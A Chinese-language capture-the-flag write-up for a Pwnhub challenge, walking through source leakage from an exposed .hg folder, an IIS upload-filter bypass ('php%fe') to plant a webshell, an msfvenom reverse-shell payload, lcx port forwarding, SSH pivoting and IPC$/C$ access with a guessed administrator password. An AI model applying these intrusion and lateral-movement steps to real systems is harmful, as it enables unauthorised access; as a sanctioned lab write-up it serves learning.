Pwnhub之深入敌后writeup

好艰难的一趟旅程

pwnhub1

网站看看没啥发现, 端口扫扫也没啥发现

然后用猪猪侠的dirfuzz 扫描路径, 可以扫到有file/.hg路径, 然后用https://github.com/kost/dvcs-ripper 可以搞到源码

pwnhub2

接下来就是代码审计一波

漏洞点在uploader.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
session_start();

// Get the filename and make sure it is valid
$filename = basename($_FILES['file']['name']);


// Get the username and make sure it is valid
$username = $_SESSION['userName'];
if (!preg_match('/^[\w_\-]+$/', $username) ){
echo "Invalid username";
header("Refresh: 2; url=files.php");
exit;
}

if(isset($_POST['submit'])){
$filename =md5(uniqid(rand()));
$filename = preg_replace("/[^\w]/i", "", $filename);
$upfile = $_FILES['file']['name'];
$upfile = str_replace(';',"",$upfile);
$tempfile = $_FILES['file']['tmp_name'];
$ext = trim(get_extension($upfile)); // null
if(in_array($ext,array('php','php3','php5','php7','phtml'))){
die('Warning ! File type error..');
}
if($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' or $ext == 'htaccess') $ext = 'file';

$full_path = sprintf("./users_file_system/%s/%s.%s", $username, $filename,$ext);

}



if (move_uploaded_file($_FILES['file']['tmp_name'], $full_path) ){
header("Location: files.php");
exit;
} else {
header("Location: upload_failure.php");


exit;
}
function get_extension($file){
return strtolower(substr($file, strrpos($file, '.')+1));
}
?>

初看好像写的没问题, 但是之前随便看看站点的时候就发现了这是一个Windows server + IIS的站点

然后这个上传漏洞以前遇到过, 还写过wp

http://old.lazysheep.cc/2015/05/19/0x24/

然后通过Fuzz也可以bypass这个上传过滤, aklis.php%fe也可以成功上传php文件

pwnhub3

得到webshell以后, 用msf生成了个反弹shell的exe(aklis.exe)

1
$ msfvenom -p windows/shell_reverse_tcp LHOST=xxxx LPORT=6666 -f exe -o /tmp/reverse.exe

pwnhub4

找个内网的ip: 172.31.5.95, 通过xshell对该目标进行ssh连接, 用户是ubuntu

之后用的是dlive里的lcx.exe进行端口转发, 参考:

http://wps2015.org/drops/drops/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E4%B8%AD%E8%BD%AC%E5%8F%91%E5%B7%A5%E5%85%B7%E6%80%BB%E7%BB%93.html

windows的命令:

1
C:\inetpub\wwwroot\file\users_file_system\dlive\> lcx.exe -slave xxx 10000 172.31.5.95 22

我的xxx机子的命令:

1
$ ./portmap -m 2 -p1 10000 -p2 12345

portmap是linux下的lcx, 下载地址:http://www.vuln.cn/2791

然后就是通过ssh进行连接了

1
2
$ ssh ubuntu@xxx -p12345
password: abc@elk

密码从提示里知道的:
pwnhub5

在根目录下发现了flag, 本以为做出来了, 然后得知是假的, 简直奔溃……

该ubuntu服务器, ubuntu用户可以sudo, 有root权限, 不过不能访问外面, 想装工具也不方便…

然后在/home/ubuntu/.bash_history里找到了又一个内网ip: 172.31.13.133

.bash_history里也可以发现, 172.31.13.133开了135, 139, 445三个端口

pwnhub6

然后就进行了一系列的找相关漏洞, 把相应端口转发出来用msf测试, 未果….

然后找到$IPC相关命令

在windows机子上使用命令:

1
2
3
4
5
6
7
8
9
C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "" /user:""
net use \\172.31.13.133\ipc$ "" /user:""
The command completed successfully.

C:\inetpub\wwwroot\file\users_file_system\aklis>net view \\172.31.13.133
net view \\172.31.13.133
System error 5 has occurred.

Access is denied.

但是没用, 尝试登陆…..

1
2
3
C:\inetpub\wwwroot\file\users_file_system\aklis>net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
net use \\172.31.13.133\ipc$ "abc@ELK" /user:"Administrator"
The command completed successfully.

登陆成功…..

密码是怎么得到的?

根据提示:

1
2017.01.15 11:50:00administrator:啊,好烦啊,需要设置那么多密码,偷懒好了,妈蛋,windows为啥还有密码策略。

然后查了下windows的密码策略

1
2
3
4
5
6
7
长度至少为 6 个字元
包含下列四种字元中的三种:
英文大写字元 (A 到 Z)
英文小写字元 (a 到 z)
10 进位数字 (0 到 9)
非英文字母字元 (例如: !、$、#、%)
建立或变更密码时会強制执行复杂 性需求

然后一猜就猜到了…..

之后是

1
2
3
C:\inetpub\wwwroot\file\users_file_system\aklis>net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
net use d: \\172.31.13.133\c$ "abc@ELK" /user:"Administrator"
The command completed successfully.

然后是进入D:, 找flag, 但是没找到, 然后得知flag就是在该机子中, 然后搜了一波windows下的搜索文件命令:

1
2
3
4
D:\>for /r D: %i in (*flag*) do @echo %i
for /r D: %i in (*flag*) do @echo %i
D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\flag.txt
D:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.lnk

好了….找到flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
D:\>cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"
cd "Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5"

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>dir
dir
Volume in drive D has no label.
Volume Serial Number is B2D4-D0F2

Directory of D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5

12/12/2016 02:26 <DIR> .
12/12/2016 02:26 <DIR> ..
12/01/2017 08:35 31 flag.txt
10/06/2009 21:14 7,169 Workflow.Targets
10/06/2009 21:14 8,680 Workflow.VisualBasic.Targets
3 File(s) 15,880 bytes
2 Dir(s) 2,673,094,656 bytes free

D:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5>type flag.txt
type flag.txt
pwnhub{flag:y0u f0und my h3art}

文章目录